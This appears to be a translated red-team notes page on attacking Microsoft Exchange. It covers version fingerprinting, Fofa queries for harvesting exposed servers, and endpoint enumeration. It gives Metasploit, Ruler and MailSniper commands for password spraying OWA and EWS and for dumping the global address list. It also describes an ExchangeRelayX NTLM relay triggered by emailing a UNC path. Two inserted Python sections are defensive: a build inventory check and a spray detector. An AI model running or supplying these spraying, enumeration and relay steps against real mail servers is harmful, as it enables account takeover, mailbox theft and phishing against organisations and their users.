Exchange version identification #
1. Visit the OWA login page
https://target/owa
2. Right-click to view the page source and note the version number, here 15.1.1713
3. Visit the website
Comparing against it, the version is Exchange 2016 CU12
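The same build-number observation can be turned into an inventory check for your own OWA endpoints (is the server still on a current CU?). The following is an added example, not part of the original notes: it extracts the build string from the asset paths of an OWA login page and maps it to the Exchange generation, with the one CU mapping the notes give (15.1.1713 = Exchange 2016 CU12). The HTML fragment, the `KNOWN_BUILDS` table and the function names are constructed for this example; extend the table from Microsoft's build-number list for a complete check.

```python
import re
from typing import Optional

# Constructed sample of an OWA login page fragment (not a real capture).
# The build number shows up in the asset paths the login page references.
SAMPLE_OWA_HTML = """
<link rel="shortcut icon" href="/owa/auth/15.1.1713/themes/resources/favicon.ico" type="image/x-icon">
<script type="text/javascript" src="/owa/auth/15.1.1713/scripts/premium/flogon.js"></script>
"""

# Well-known major.minor prefixes of the Exchange product generations.
GENERATIONS = {
    "14.": "Exchange 2010",
    "15.0.": "Exchange 2013",
    "15.1.": "Exchange 2016",
    "15.2.": "Exchange 2019",
}

# Per-CU mapping; only the build the notes themselves identify is filled in.
# Extend from Microsoft's official build-number table for a full inventory check.
KNOWN_BUILDS = {
    "15.1.1713": "Exchange 2016 CU12",
}

# Matches /owa/15.1.1713/... or /owa/auth/15.1.1713.5/... and captures major.minor.build.
BUILD_RE = re.compile(r"/owa/(?:auth/)?(\d+\.\d+\.\d+)(?:\.\d+)?/")


def extract_build(html: str) -> Optional[str]:
    """Return the first build number found in OWA asset paths, or None."""
    m = BUILD_RE.search(html)
    return m.group(1) if m else None


def classify_build(build: str) -> str:
    """Map a build string to the Exchange generation and, where known, the CU."""
    if build in KNOWN_BUILDS:
        return KNOWN_BUILDS[build]
    for prefix, name in GENERATIONS.items():
        if build.startswith(prefix):
            return f"{name} (unknown CU, build {build})"
    return f"unrecognised build {build}"


def identify(html: str) -> str:
    """End-to-end: page markup -> human-readable version string."""
    build = extract_build(html)
    if build is None:
        return "no build number found"
    return classify_build(build)


if __name__ == "__main__":
    print(identify(SAMPLE_OWA_HTML))  # Exchange 2016 CU12
```

Run it against the saved source of your own OWA login page; a build that only resolves to a generation with "unknown CU" is a prompt to compare against the official build list.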
Collecting Exchange servers with Fofa #
Fofa can also help us quickly collect servers for each Exchange version. The search rules below do not match on header, body or title, yet the results are quite accurate.
Rough Exchange fingerprint
# more accurate
title="Outlook Web App" body="/owa/auth/" body="/themes/resources/segoeui-semilight.ttf"
# less accurate
title="Exchange"
Per-version fingerprints
# exchange 2010
app="Microsoft-Exchange-2010-POP3-server-version-03.1" || app="Microsoft-Exchange-Server-2010"
# exchange 2013
app="Microsoft-Exchange-2013" || app="Microsoft-Exchange-Server-2013-CU21" || app="Microsoft-Exchange-Server-2013-CU17" || app="Microsoft-Exchange-Server-2013-CU23" || app="Microsoft-Exchange-Server-2013-CU13" || app="Microsoft-Exchange-Server-2013-CU22" || app="Microsoft-Exchange-Server-2013-CU11" || app="Microsoft-Exchange-Server-2013-CU2" || app="Microsoft-Exchange-Server-2013-CU16" || app="Microsoft-Exchange-Server-2013-CU19" || app="Microsoft-Exchange-Server-2013-CU3" || app="Microsoft-Exchange-Server-2013-CU18" || app="Microsoft-Exchange-Server-2013-CU5" || app="Microsoft-Exchange-Server-2013-CU20" || app="Microsoft-Exchange-Server-2013-CU12" || app="Microsoft-Exchange-Server-2013-CU15" || app="Microsoft-Exchange-Server-2013-CU10" || app="Microsoft-Exchange-Server-2013-CU9" || app="Microsoft-Exchange-Server-2013-CU6" || app="Microsoft-Exchange-Server-2013-CU7" || app="Microsoft-Exchange-Server-2013-CU1" || app="Microsoft-Exchange-Server-2013-CU14" || app="Microsoft-Exchange-Server-2013-CU8" || app="Microsoft-Exchange-Server-2013-RTM" || app="Microsoft-Exchange-Server-2013-SP1" || app="Microsoft-Exchange-2013"
# exchange 2016 (Fofa reports that the rule does not exist)
app="Microsoft-Exchange-Server-2016-CU19" || app="Microsoft-Exchange-Server-2016-CU3" || app="Microsoft-Exchange-Server-2016-CU12" || app="Microsoft-Exchange-Server-2016-RTM" || app="Microsoft-Exchange-Server-2016-CU7" || app="Microsoft-Exchange-Server-2016-CU17" || app="Microsoft-Exchange-Server-2016-CU2" || app="Microsoft-Exchange-Server-2016-CU1" || app="Microsoft-Exchange-Server-2016-CU14" || app="Microsoft-Exchange-Server-2016-CU5" || app="Microsoft-Exchange-Server-2016-CU11" || app="Microsoft-Exchange-Server-2016-CU9" || app="Microsoft-Exchange-Server-2016-CU16" || app="Microsoft-Exchange-Server-2016-CU10" || app="Microsoft-Exchange-Server-2016-CU6" || app="Microsoft-Exchange-Server-2016-CU13" || app="Microsoft-Exchange-Server-2016-CU18" || app="Microsoft-Exchange-Server-2016-CU8" || app="Microsoft-Exchange-Server-2016-CU4" || app="Microsoft-Exchange-2016-POP3-server"
# exchange 2019
app="Microsoft-Exchange-Server-2019-CU5" || app="Microsoft-Exchange-Server-2019-CU3" || app="Microsoft-Exchange-Server-2019-Preview" || app="Microsoft-Exchange-Server-2019-CU8" || app="Microsoft-Exchange-Server-2019-CU1" || app="Microsoft-Exchange-Server-2019-CU7" || app="Microsoft-Exchange-Server-2019-CU2" || app="Microsoft-Exchange-Server-2019-CU6" || app="Microsoft-Exchange-Server-2019-RTM" || app="Microsoft-Exchange-Server-2019-CU4"
Locating the internal Exchange server via SPN #
setspn -Q IMAP/* | findstr "exchange"
Collecting Exchange endpoints with msmailprobe #
Obtain Exchange's interfaces and login entry points
git clone https://github.com/busterb/msmailprobe.git
cd msmailprobe/
go build msmailprobe.go
./msmailprobe identify -t <exchange-server-hostname>.<domain>
When outside the domain, first add a hosts entry: vim /etc/hosts
./msmailprobe identify -t mail.test.lab
It identifies the endpoints susceptible to account enumeration, as well as some exposed ports
Password spraying against the Exchange login entry points #
Password spraying against the OWA login with msf #
Once we have obtained Exchange's interfaces and login entry points, we can use msf for password spraying; a username list and a password list need to be prepared. During actual password spraying, turn the thread count down as far as possible: better slow, accurate and stable than fast, hasty and wrong
use auxiliary/scanner/http/owa_login
set USER_FILE ./user.txt
set PASS_FILE ./pass.txt
set STOP_ON_SUCCESS false
run
Password spraying against EWS with msf #
Exchange Web Services (EWS) is the API provided by Exchange for operating Exchange functionality; the EWS endpoint can also be brute-forced / password-sprayed.
But on this page, even when the correct mailbox is entered, it seems impossible to log in
But by brute-forcing this page, we can still obtain correct mailbox account passwords
use auxiliary/scanner/http/owa_ews_login
set rhosts 192.168.10.6
set user_file ./user.txt
set PASS_FILE ./pass.txt
set stop_on_success false
run
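The low-thread, many-account pattern recommended in the two msf sections above is exactly what a defender should key on: many distinct usernames failing from one source, few attempts per account, across OWA and EWS together (a per-account lockout threshold never fires on one attempt per user). The following detection logic is an added example, not from the original notes; the simplified log format, the sample lines, the thresholds and the function names are all constructed for it. Real deployments would feed it from IIS W3C logs or the Exchange HTTP proxy logs instead.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed sample authentication log (simplified format, not a real IIS capture):
# "<ISO timestamp> <client ip> <endpoint> <username> <http status>"
# 10.0.0.50 sprays five accounts across OWA and EWS, then logs in as frank;
# 10.0.0.77 is one user mistyping their own password twice, then succeeding.
SAMPLE_LOG = """\
2024-05-01T09:00:01 10.0.0.50 /owa/auth.owa test.lab\\alice 401
2024-05-01T09:02:13 10.0.0.50 /owa/auth.owa test.lab\\bob 401
2024-05-01T09:04:40 10.0.0.50 /ews/exchange.asmx test.lab\\carol 401
2024-05-01T09:07:02 10.0.0.50 /ews/exchange.asmx test.lab\\dave 401
2024-05-01T09:09:55 10.0.0.50 /owa/auth.owa test.lab\\erin 401
2024-05-01T09:12:30 10.0.0.50 /owa/auth.owa test.lab\\frank 200
2024-05-01T09:01:10 10.0.0.77 /owa/auth.owa test.lab\\alice 401
2024-05-01T09:01:25 10.0.0.77 /owa/auth.owa test.lab\\alice 401
2024-05-01T09:01:41 10.0.0.77 /owa/auth.owa test.lab\\alice 200
"""

Event = Tuple[datetime, str, str, str, int]


def parse_log(text: str) -> List[Event]:
    """Parse the constructed five-field format into (time, ip, endpoint, user, status)."""
    events: List[Event] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, endpoint, user, status = line.split()
        events.append((datetime.fromisoformat(ts), ip, endpoint, user, int(status)))
    return events


def detect_spray(events: List[Event], window: timedelta = timedelta(minutes=30),
                 min_users: int = 5, max_per_user: int = 2) -> Dict[str, List[str]]:
    """Return {client_ip: sorted usernames} for sources whose failures look like a spray.

    A spray is many distinct accounts with few failures each inside a sliding time
    window, keyed on the source and ignoring which endpoint (OWA or EWS) was hit.
    The window is deliberately long so that slow, low-thread spraying still aggregates.
    """
    by_ip: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, ip, _endpoint, user, status in events:
        if status == 401:
            by_ip[ip].append((ts, user))

    flagged: Dict[str, List[str]] = {}
    for ip, fails in by_ip.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            # Advance the window start until every failure in [start, end] fits the window.
            while fails[end][0] - fails[start][0] > window:
                start += 1
            per_user = Counter(user for _, user in fails[start:end + 1])
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                flagged[ip] = sorted(per_user)
                break
    return flagged


def successes_from_flagged_sources(events: List[Event],
                                   flagged: Dict[str, List[str]]) -> Dict[str, List[str]]:
    """Accounts that authenticated successfully from a source already flagged as spraying.

    This is the follow-up check that matters: STOP_ON_SUCCESS false means the sprayer
    keeps going after a hit, so any success from that source is a likely compromise.
    """
    hits: Dict[str, List[str]] = defaultdict(list)
    for _ts, ip, _endpoint, user, status in events:
        if ip in flagged and status == 200:
            hits[ip].append(user)
    return dict(hits)


if __name__ == "__main__":
    evts = parse_log(SAMPLE_LOG)
    sprayers = detect_spray(evts)
    print("spraying sources:", sprayers)
    print("successful logins from those sources:", successes_from_flagged_sources(evts, sprayers))
```

The thresholds are tuning knobs: a sprayer using the delay settings shown in the Ruler section below may spread attempts over hours, so widen `window` (or aggregate per day) rather than tightening `min_users`. Keying on source IP also misses distributed spraying; a second pass keyed on the password-failure count per account across all sources covers that case.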
Obtaining all Exchange mailbox users with mailsniper.ps1 #
MailSniper is a penetration testing tool for searching email in a Microsoft Exchange environment for specific terms (passwords, internal intelligence, network architecture information, etc.). It can be used as a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in the domain.
MailSniper also includes additional modules for password spraying, enumerating users and domains, gathering the Global Address List (GAL) from OWA and EWS, and checking mailbox permissions for every Exchange user in the organization.
Project address:
Collect mailboxes in preparation for subsequent brute forcing
Prerequisites
- Hold the account and password of one user's mailbox, and be able to log in to Outlook with it
- The ps1 can only be run after logging in as a domain user
For example, we have logged in as an ordinary domain user and obtained a mailbox account and password (demo / demo.com) that can log in to Outlook
powershell -exec bypass
Import-Module .\MailSniper.ps1
Get-GlobalAddressList -ExchHostname <outlook address> -UserName <domain user> -Password <known mailbox password> -OutFile <output>.txt
Get-GlobalAddressList -ExchHostname mail.test.lab -UserName demo -Password demo.com
# -ExchHostname: ping -a <exchange server ip> -> hostname -> hostname.domain (mail.test.lab)
All mailboxes have been exported
Password spraying against internal Exchange mailbox users with Ruler #
Ruler is cross-platform, so it can perform password spraying from Linux, Windows or Mac OS X. Once the mailbox accounts have been obtained as above, password spraying can be carried out
Project:
ruler-win64.exe --domain test.lab -k brute --users userlist.txt --passwords pass.txt --delay 0 --threads 10 -v
Reference:
Relaying against internal Exchange with ExchangeRelayX #
Microsoft Exchange supports many services, such as ActiveSync, EWS and OWA. Some of these services (MAPI, RPC and EWS) support NTLM authentication by default, which may allow red teamers to perform an NTLM Relay Attack
ExchangeRelayX demonstrates an attacker's ability to perform SMB- or HTTP-based NTLM relay attacks against the EWS endpoint of an on-premises Microsoft Exchange server in order to compromise victim mailboxes. The tool gives the attacker an OWA-like interface with access to the user's mailbox and contacts
Download address:
# Use the exchangeRelayx.py script to verify whether the Exchange Server supports NTLM authentication:
python3 exchangeRelayx.py -c -t https://192.168.10.6
# -t is the IP address of the Exchange server
# But the script would not run for me here
- Verify whether the Exchange service performs NTLM authentication
- If it does, proceed directly to the Relay Attack: exchangeRelayx.py -t https://192.168.10.6 starts a web server listening on local port 8000, and as soon as a relay succeeds the successful user is shown on the page
- Send an email containing a UNC path to Exchange; once it is clicked, the relay happens